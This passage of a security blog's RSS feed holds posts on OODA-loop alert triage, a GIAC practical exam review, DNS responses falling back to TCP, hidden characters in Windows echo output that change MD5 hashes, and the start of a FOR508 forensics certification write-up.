&lt;/h1&gt;&lt;p&gt;OODA is an acronym for Observe, Orient, Decide, Act, one word for each phase of the OODA loop. Originally designed to be super snappy (as is required for fighter pilots doing fighter pilot things), the timeframe of use can be expanded out over &lt;em&gt;days&lt;/em&gt;. For an example of the original use of the loop, see &lt;a class=&#34;link&#34; href=&#34;https://youtu.be/bsfMxCqx5YA?si=9b6P0TU1IYozq7XK&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;this video&lt;/a&gt;. Now let’s apply it to alert triage!&lt;/p&gt;
&lt;h2 id=&#34;observe&#34;&gt;Observe
&lt;/h2&gt;&lt;p&gt;In the observe phase, I like to go a little deeper than just “oh, a new alert”. I like to bound my review phase by &lt;em&gt;only&lt;/em&gt; the information in the alert itself. If I have to leave the alert, for example to look up a domain / user / whathaveyou, then I’m no longer observing. but if I look at an IP in the alert itself that is, say, 172.32.14.5, and I go “that’s an external IP address” (it really is), then that’s a valid observation.&lt;/p&gt;
&lt;h2 id=&#34;orient&#34;&gt;Orient
&lt;/h2&gt;&lt;p&gt;Orientation is where we start gathering additional context to understand the environment and conditions in which the alert fired. &lt;strong&gt;I like to bound the entire orientation phase to 5 minutes.&lt;/strong&gt; If I’m taking more than 5 minutes to look at an alert and make a decision, then I’m investigating without choosing to investigate - also known as falling down rabbit holes! This is what we’re trying to avoid.&lt;/p&gt;
&lt;p&gt;So maybe I look up the department the user account mentioned in the alert belongs to, because if the user is a developer, the activity alerted on might be allowed. Maybe I look up the IP address to see if it belongs to my organisation. Maybe I search across teams for a filename to see if it’s being discussed / used by design. Most importantly, all of these orientations must be completed in &lt;strong&gt;less than 5 minutes - TOTAL.&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&#34;decide&#34;&gt;Decide
&lt;/h2&gt;&lt;p&gt;You have all of the information you can quickly gather (remember the 5 minutes rule!), so it’s time to decide what to do. While I’m generally against fixed-track outcomes, setting them for alert review has been quite productive, in my experience. In the case of alert review, I tend to encourage my staff to chase one of three outcomes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Close the alert. There’s no risk to our organisation, so no further action is required by our team. This might be supported by adding a detection review request, etc.&lt;/li&gt;
&lt;li&gt;Escalate the alert. This looks scary and beyond the scope of my team, so it’s time to get the more experienced folks in the next tier involved.&lt;/li&gt;
&lt;li&gt;Investigate further. There’s definitely something odd going on that may or may not be an incident, let’s use our discretion and investigate further.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Based on what you found in observe and orient, the decision should be pretty obvious, once you get to this step. Note also choosing to investigate is not simply repeating the observe and orient phases, because you’re no longer constrained to things that you can achieve in a single 5 minute window.&lt;/p&gt;
&lt;h2 id=&#34;act&#34;&gt;Act
&lt;/h2&gt;&lt;p&gt;I hope you’re ready for this, there’s so much going on in this step: You’ve decided the best course of action with the information available to you. Do it.&lt;/p&gt;
&lt;h1 id=&#34;conclusion&#34;&gt;Conclusion
&lt;/h1&gt;&lt;p&gt;I’ve taught this concept to a few different customers, and spoken about it at the mighty CHCon. I’ve included links to my talk and the presentation slides below. If they’re of value to you or someone you know, please do go forth and spread the good word. I appreciate it!&lt;/p&gt;
&lt;p&gt;&lt;a class=&#34;link&#34; href=&#34;slides.pptx&#34; &gt;Slides!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class=&#34;link&#34; href=&#34;https://youtu.be/acXSWwxFDH0?si=1k7KwvWCKK8uYEWW&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Some random waxing lyrical to the slides&lt;/a&gt;&lt;/p&gt;
</description>
        </item>
        <item>
        <title>GX-CS - GIAC Experienced CyberSecurity Specialist</title>
        <link>https://thisinsecureworld.com/p/gx-cs-giac-experienced-cybersecurity-specialist/</link>
        <pubDate>Tue, 23 May 2023 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/gx-cs-giac-experienced-cybersecurity-specialist/</guid>
        <description>&lt;p&gt;Phwoar, what an exam. This was simultaneously the most stressful and most fun exam I&amp;rsquo;ve taken in a long time.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;ll dive into a bunch of stuff below (that I hope won&amp;rsquo;t break NDA), but here&amp;rsquo;s the headline: this exam is FUN! All of the tasks were tasks you could reasonably be expected to do as a cyber security professional in one of a number of disciplines (GRC / IR / engineer etc). None of the tasks felt arbitrary or obscure - no testing one random bit of knowledge with no real world application. There was no arbitrary removing of tools from VMs to make the exam artificially harder. All built-in OS tools were available on every machine (every Windows box had ISE, etc). There were different levels of after-market tools installed (not every machine had nmap or strings, for example), but if it shipped with the OS, it was available.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pro tip:&lt;/strong&gt; The strategy I employed here was to read over every question when I hit it, maybe give the VM a quick poke, then if I wasn&amp;rsquo;t confident I could solve it in less than 10 minutes (25 questions over 4 hours is roughly 9.5 minutes per question) I&amp;rsquo;d slap that skip button. This meant when I got to the end of the 25 questions and started reviewing the skipped questions, I could divide questions skipped my remaining time, to work out how much longer I could spend on these tougher questions. The biggest downside to this approach is that you can&amp;rsquo;t take a break (as you can&amp;rsquo;t take a break without answering skipped questions).&lt;/p&gt;
&lt;p&gt;There was one question (and, of course, it was the first question) where I was like “I have NFI how to do this thing, and I know for a fact actually doing it isn’t in any of my material”. I immediately skipped this question with the intention of returning and trying and hoping one of the other questions would give me a hint, but when I got back to it I still had no idea how to even start. I just noped out, randomly guessed, and moved on to the other skipped questions.&lt;/p&gt;
&lt;p&gt;I did have a couple of small teething issues with the exam that I didn&amp;rsquo;t think was just me being a muppet. For example, one question could be summed up as &amp;lt;do this zany technical thing, and provide the resulting hash&amp;gt;. After I&amp;rsquo;d done the work and flicked through the available answers, I saw the answers looked far more base64-ish than hash-ey (more than just hex characters). Additionally, some parts of the exam are like “do these things, and something on the machine will change to show you the answer to this multi choice question”. Some of those things didn’t change despite me being 100% sure I’d nailed it. I just chucked comments in explaining what I did in detail hoping that it’d be enough.&lt;/p&gt;
&lt;p&gt;I don’t know what the pass mark is, but I blindly guessed on at least 4 of the questions, all of which are multichoice with 8 answers. So the odds of getting even one of them right with that approach is less than ideal.&lt;/p&gt;
&lt;p&gt;I think the best part of prep I did wasn’t just making indexes and notes, but making sure I knew how to find easy answers quickly. For example, from the objectives, Linux Password Cracking &amp;gt; Hashcat (so I’m not spoilies). Assuming they want you to crack passwords in a shadow file, you need to understand how to use hashcat etc to do so. Now, I’m not going to sit down and memorise the different mode numbericals (-m), because that’s hard. Sticking it in an index will take time to dig up and sift through when I need it. the easier way I found is to memorise &lt;code&gt;hashcat --help | grep ‘\$6’&lt;/code&gt; (or whatever $ value I need).&lt;/p&gt;
&lt;p&gt;Similarly for Windows: I’m terrible with powershell, so things like &lt;code&gt;get-help *remove*&lt;/code&gt; became my go to there (or looking things up in ISE). The key is knowing how to find the answer fast, not memorising every flag and parameter.&lt;/p&gt;
&lt;p&gt;When initially reading the question, I understood conceptually pretty much right away what I needed to do, some of the struggle was just remember where / how / which flags etc. Usually that’s a google jobbie for me, but you can’t do that in the exam, so it was a nice eye opener on how reliant I’d become on the internet to solve my problems.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re uncertain how tough or multi-step the exam is really going to be, the demo questions were very, very representative (at least for me), and showed me I really needed to buckle down and get my study on / notes cleaned up. I don&amp;rsquo;t think I would have passed if they hadn&amp;rsquo;t have scared me straight.&lt;/p&gt;
&lt;p&gt;Through my (roughly) 8 years of experience in cyber security I’ve done most of the things I had to do in the test; fluffing around with snort, tinkering with file sytem permissions, touching packets on networks, host based shenanigans and forensics, light red team mischief etc.&lt;/p&gt;
&lt;p&gt;For context on difficulty: I usually get through SANS exams in about an hour. This one took me right down to the last 8 minutes. Not every question was brutal - some I completed in a couple of minutes - but the hard ones were HARD. I spent an hour on the last 3, stumbling around knowing what I needed to do but working out how to actually get it done.&lt;/p&gt;
&lt;p&gt;All in all, I love this exam, and I&amp;rsquo;m really looking forward to sitting at least three more (GSE here I come!)&lt;/p&gt;
</description>
        </item>
        <item>
        <title>DNS over TCP?!</title>
        <link>https://thisinsecureworld.com/p/dns-over-tcp/</link>
        <pubDate>Wed, 22 Mar 2023 00:36:31 +1300</pubDate>
        
        <guid>https://thisinsecureworld.com/p/dns-over-tcp/</guid>
        <description>&lt;p&gt;Working with colleagues on a detection ultimately caused by a Zeek bug, we found there&amp;rsquo;s a lot of discussion online about how &amp;ldquo;DNS uses TCP for Zone Transfers&amp;rdquo;. While this is true, it&amp;rsquo;s not the complete truth! To be fair, it used to be true in practice, because DNS responses used to be a lot smaller.&lt;/p&gt;
&lt;p&gt;What actually happens is, the client sends the standard &amp;ldquo;Hey, gimme the A record for &lt;code&gt;dnstcp.deloril.com&lt;/code&gt;&amp;rdquo;. If the response to the request is larger than 512 bytes, the DNS Server will send back only your query (in this example, &lt;code&gt;dnstcp.deloril.com&lt;/code&gt;), and set the &amp;ldquo;truncated&amp;rdquo; flag to true in the response packet. (this is because UDP responses are limited to 512 bytes for practical reasons)&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/dns-over-tcp/dns-udp.png&#34;
	width=&#34;1163&#34;
	height=&#34;421&#34;
	srcset=&#34;https://thisinsecureworld.com/p/dns-over-tcp/dns-udp_hu_db2486273d2673fd.png 480w, https://thisinsecureworld.com/p/dns-over-tcp/dns-udp_hu_c1c22aec8d625faf.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;UDP DNS Response, note the truncation bit&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;276&#34;
		data-flex-basis=&#34;662px&#34;
	
&gt;
When the client receives the response, it sees the truncated flag set, and goes &amp;ldquo;oh damn, I need to request this record over a mechanism that can receive large responses reliably.&amp;rdquo; TCP to the rescue!
The client will then request the same record, but it will do it over TCP instead of UDP.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/dns-over-tcp/dns-tcp.png&#34;
	width=&#34;1089&#34;
	height=&#34;480&#34;
	srcset=&#34;https://thisinsecureworld.com/p/dns-over-tcp/dns-tcp_hu_6713d2daea775596.png 480w, https://thisinsecureworld.com/p/dns-over-tcp/dns-tcp_hu_46057a6dbff3047f.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;TCP DNS Response&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;226&#34;
		data-flex-basis=&#34;544px&#34;
	
&gt;
For a long time, this was just zone transfers, but nowadays (with DKIM and resource records and DNSSEC) large DNS responses are becoming a lot more common. Don&amp;rsquo;t believe me? Try it yourself! Spin up wireshark, and make a TXT record request for &lt;code&gt;dnstcp.thisinsecureworld.com&lt;/code&gt;. You&amp;rsquo;ll see a UDP request, and the response will have the truncate flag set, then a TCP request will be made for the same resource. Your DNS client might even tell you it received a large response and it&amp;rsquo;s automagically retrying over TCP.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/dns-over-tcp/nslookup.png&#34;
	width=&#34;421&#34;
	height=&#34;187&#34;
	srcset=&#34;https://thisinsecureworld.com/p/dns-over-tcp/nslookup_hu_4cd191ddd88851c5.png 480w, https://thisinsecureworld.com/p/dns-over-tcp/nslookup_hu_baa28063a595b4a1.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;nslookup doing all the work&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;225&#34;
		data-flex-basis=&#34;540px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;For anyone looking for the gory details, check out &lt;a class=&#34;link&#34; href=&#34;https://www.rfc-editor.org/rfc/rfc2181&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;the RFC&lt;/a&gt;.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>Hashing and Hidden Characters</title>
        <link>https://thisinsecureworld.com/p/hashing-and-hidden-characters/</link>
        <pubDate>Thu, 23 Jun 2022 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/hashing-and-hidden-characters/</guid>
        <description>&lt;p&gt;I was sitting in a training class the other day, learning about hashing. The instructor ran a demo on the screen of the below command.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;C:\Users\student\Desktop\md5deep-4.4&amp;gt;echo koala | md5deep64
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;340fa0664ec760eadddf2216bb8bc1d5
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;One eagle-eyed student asked an inisghtful question, absolutely showing off his critical thinking skills (ok, ok, it was me, and I only asked it in my brain).&lt;/p&gt;
&lt;p&gt;&amp;ldquo;In windows, does the space between koala and | matter?&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Being a naturally lazy lad, I can&amp;rsquo;t be bothered downloading and installing md5deep64, so I crack open the amazing &lt;a class=&#34;link&#34; href=&#34;https://gchq.github.io/CyberChef&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;CyberChef&lt;/a&gt;. I type koala into the input box, and add the MD5 recipe, as shown below.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/hashing-and-hidden-characters/koala-cc.png&#34;
	width=&#34;1718&#34;
	height=&#34;384&#34;
	srcset=&#34;https://thisinsecureworld.com/p/hashing-and-hidden-characters/koala-cc_hu_65df9cc27e07bab3.png 480w, https://thisinsecureworld.com/p/hashing-and-hidden-characters/koala-cc_hu_cb055e27272beda0.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;The hash of koala in CyberChef&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;447&#34;
		data-flex-basis=&#34;1073px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;Success! Those hashes don&amp;rsquo;t match, so the space between koala and pipe must have been included in the hash input. Heck, we&amp;rsquo;ve already got cyberchef open, let&amp;rsquo;s do a sanity check while we&amp;rsquo;re here (the pipe looking character after koala is actually a flashing cursor, showing there&amp;rsquo;s a space there)&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/hashing-and-hidden-characters/koala-space.png&#34;
	width=&#34;1674&#34;
	height=&#34;362&#34;
	srcset=&#34;https://thisinsecureworld.com/p/hashing-and-hidden-characters/koala-space_hu_552ab154596a11bf.png 480w, https://thisinsecureworld.com/p/hashing-and-hidden-characters/koala-space_hu_1c1f60a3dba2a24c.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;The hash of koala with a space in CyberChef&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;462&#34;
		data-flex-basis=&#34;1109px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;Hoo- wait, what? That&amp;rsquo;s a different hash again. Fine, damn our laziness, let&amp;rsquo;s go find &lt;a class=&#34;link&#34; href=&#34;https://github.com/jessek/hashdeep/releases&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;md5deep&lt;/a&gt; and do our own testing. First, we replicate the condition we&amp;rsquo;re testing for:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;C:\Users\student\Desktop\md5deep-4.4&amp;gt;echo koala | md5deep64
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;340fa0664ec760eadddf2216bb8bc1d5
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;Hooray! It matches. Aight, let&amp;rsquo;s get rid of the space, see if our hash changes&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;C:\Users\student\Desktop\md5deep-4.4&amp;gt;echo koala|md5deep64
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;fa453c56d2590383aac34119a707ad35
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;Starting to feel like a pokemon master collecting all these hashes. Fine, let&amp;rsquo;s see what&amp;rsquo;s actually getting passed to md5deep64 when we pipe it through. I know in the below command I&amp;rsquo;m also replacing pipe (|) with a redirect to disk (&amp;gt;), but we&amp;rsquo;ll test out to make sure that doesn&amp;rsquo;t break it later.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;4
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;C:\Users\student\Desktop\md5deep-4.4&amp;gt;echo koala &amp;gt; myfile.txt
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;C:\Users\student\Desktop\md5deep-4.4&amp;gt;type myfile.txt
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;koala
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;So far so good. Let&amp;rsquo;s crack open myfile.txt in a hex editor (&lt;a class=&#34;link&#34; href=&#34;https://mh-nexus.de/en/hxd/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;HxD&lt;/a&gt; for me) and see exactly what made it to disk:&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/hashing-and-hidden-characters/myfile.png&#34;
	width=&#34;2240&#34;
	height=&#34;592&#34;
	srcset=&#34;https://thisinsecureworld.com/p/hashing-and-hidden-characters/myfile_hu_69c225069584935c.png 480w, https://thisinsecureworld.com/p/hashing-and-hidden-characters/myfile_hu_ccd7b9a6d9446884.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;HxD view of myfile.txt&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;378&#34;
		data-flex-basis=&#34;908px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;Referencing an &lt;a class=&#34;link&#34; href=&#34;https://www.rapidtables.com/code/text/ascii-table.html&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;ASCII table&lt;/a&gt;, we can see the characters &lt;code&gt;6B 6F 61 6C 61&lt;/code&gt; map to &lt;code&gt;k o a l a&lt;/code&gt;, so we&amp;rsquo;re on the right track. &lt;code&gt;20&lt;/code&gt; maps to &lt;code&gt;space&lt;/code&gt;, so boom! we&amp;rsquo;ve answered our initial question (is the space included to be hashed). But what are these other crazy characters - &lt;code&gt;0D 0A&lt;/code&gt;. Looking at the ASCII table, they map to &lt;code&gt;carriage return&lt;/code&gt; and &lt;code&gt;line feed&lt;/code&gt; respectively. This is basically what computers record when you hit enter in a document.&lt;/p&gt;
&lt;p&gt;History time! Think of an old school typewriter, first the &amp;ldquo;carriage&amp;rdquo; has to return to it&amp;rsquo;s starting position (when you type, it moves right along the page, so it&amp;rsquo;s returns to it&amp;rsquo;s leftmost position). Then we feed in a new line of paper (because otherwise we&amp;rsquo;d type over what we just typed). So, &lt;code&gt;0D&lt;/code&gt;, carriage return, &lt;code&gt;0A&lt;/code&gt;, line feed, new line.&lt;/p&gt;
&lt;p&gt;We solved it! &amp;hellip; or did we? We&amp;rsquo;ve still made some changes, and need to prove they didn&amp;rsquo;t introduce these changes separate from the hashing issue. Validation time!&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/hashing-and-hidden-characters/hex-to-hash.png&#34;
	width=&#34;1694&#34;
	height=&#34;418&#34;
	srcset=&#34;https://thisinsecureworld.com/p/hashing-and-hidden-characters/hex-to-hash_hu_3f1153bf92bdbdc6.png 480w, https://thisinsecureworld.com/p/hashing-and-hidden-characters/hex-to-hash_hu_d800a3e7cf2671a0.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Converting the hex to ASCII, then hashing it&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;405&#34;
		data-flex-basis=&#34;972px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;This recipe is effectively taking the hex values we enter, converting them back into ASCII, then hashing the output. And we can see our original hash! Looks like &lt;code&gt;echo&lt;/code&gt; in Windows adds a new line (a &lt;code&gt;0D 0A&lt;/code&gt;) after it&amp;rsquo;s finished printing to make it look prettier on the command line. Thanks Windows!&lt;/p&gt;
</description>
        </item>
        <item>
        <title>About</title>
        <link>https://thisinsecureworld.com/about/</link>
        <pubDate>Sun, 06 Mar 2022 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/about/</guid>
        <description>&lt;p&gt;Hey look, it’s an about page. I’ll probably get around to fleshing this out someday. For now, just know I enjoy all things tech, and helping other people learn techie things too. If you have questions or concerns, you can get me at &lt;a class=&#34;link&#34; href=&#34;mailto:blog@thisinsecureworld.com&#34; &gt;blog@thisinsecureworld.com&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&#34;on-ai-and-writing&#34;&gt;On AI and Writing
&lt;/h2&gt;&lt;p&gt;Full transparency: I use Claude to help clean up my blog posts. I write drafts that make perfect sense to me (and probably only me), then use AI to translate my brain-dump into something readable by normal humans. All the ideas, technical content, and inevitable errors are mine - Claude just helps make my writing less painful for you to read. If I’ve stuffed something up technically, that’s on me, not the AI.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>Archives</title>
        <link>https://thisinsecureworld.com/archives/</link>
        <pubDate>Sun, 06 Mar 2022 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/archives/</guid>
        <description></description>
        </item>
        <item>
        <title>FOR508 - GIAC Certified Forensic Analyst</title>
        <link>https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/</link>
        <pubDate>Fri, 08 Oct 2021 04:12:10 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/</guid>
        <description>&lt;p&gt;Date Earned: September 27, 2021&lt;/p&gt;
&lt;p&gt;Proof: &lt;a class=&#34;link&#34; href=&#34;https://www.credly.com/badges/d3e6e8d6-cfe3-4cda-a235-dd8a8e2ace7e/public_url&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://www.credly.com/badges/d3e6e8d6-cfe3-4cda-a235-dd8a8e2ace7e/public_url&lt;/a&gt;&lt;br&gt;
Linky: &lt;a class=&#34;link&#34; href=&#34;https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/1.png&#34;
	width=&#34;835&#34;
	height=&#34;298&#34;
	srcset=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/1_hu_5007818e50f684ae.png 480w, https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/1_hu_b55e2e5a2b73cea1.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;A pass is a pass&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;280&#34;
		data-flex-basis=&#34;672px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;A pass is a pass&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This post is a little different. I didn&amp;rsquo;t attend the SANS training for this before taking the exam. Reading through the syllabus on the &lt;a class=&#34;link&#34; href=&#34;https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;course page&lt;/a&gt;, I guesstimated that my experience and  some labbing specific tools I was unfamiliar with would get me over the line, but more on that below.&lt;/p&gt;
&lt;p&gt;Before sitting this exam, my pertinent experience was largely almost 3 years as an incident response consultant at Mandiant. In my time there, I spent a whole bunch of cycles examining individual hosts and performing threat hunting across entire environments for our clients. I worked and led incidents from initial triage through to remediation.&lt;/p&gt;
&lt;p&gt;In addition to performing incident response, I was a lead instructor for both Windows and Linux Enterprise Incident Response courses, and the Network Traffic Analysis course. Being an instructor for these courses required learning all artefacts and processes to a greater degree of competence, because you&amp;rsquo;ll never know which out-of-the-box question a student will ask. While &amp;ldquo;I&amp;rsquo;m not certain, but I&amp;rsquo;ll find out&amp;rdquo; is a valid response (as long as you do), being able to answer the question on the spot is even better.&lt;/p&gt;
&lt;h2 id=&#34;self-education&#34;&gt;Self-education
&lt;/h2&gt;&lt;p&gt;My first step is to enumerate all the tools, techniques, and artefacts that are covered by the SANS course and therefore are within the scope of the exam. I start by visiting the &lt;a class=&#34;link&#34; href=&#34;https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;FOR508 SANS page&lt;/a&gt;. Findings like the below tell me I should be working with Volatility, F-Response, Velociraptor and the Comae tools to gain functional knowledge, as I may be tested on them.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/2.png&#34;
	width=&#34;554&#34;
	height=&#34;292&#34;
	srcset=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/2_hu_1a31bc2f0a0b9d05.png 480w, https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/2_hu_6769ee2dc51662fa.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Hints, hints everywhere&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;189&#34;
		data-flex-basis=&#34;455px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Hints, hints everywhere&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A little further down, I see that I need to learn about timestamps and how and when they get updated. I also note some additional tools I need to get good with.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/3.png&#34;
	width=&#34;834&#34;
	height=&#34;294&#34;
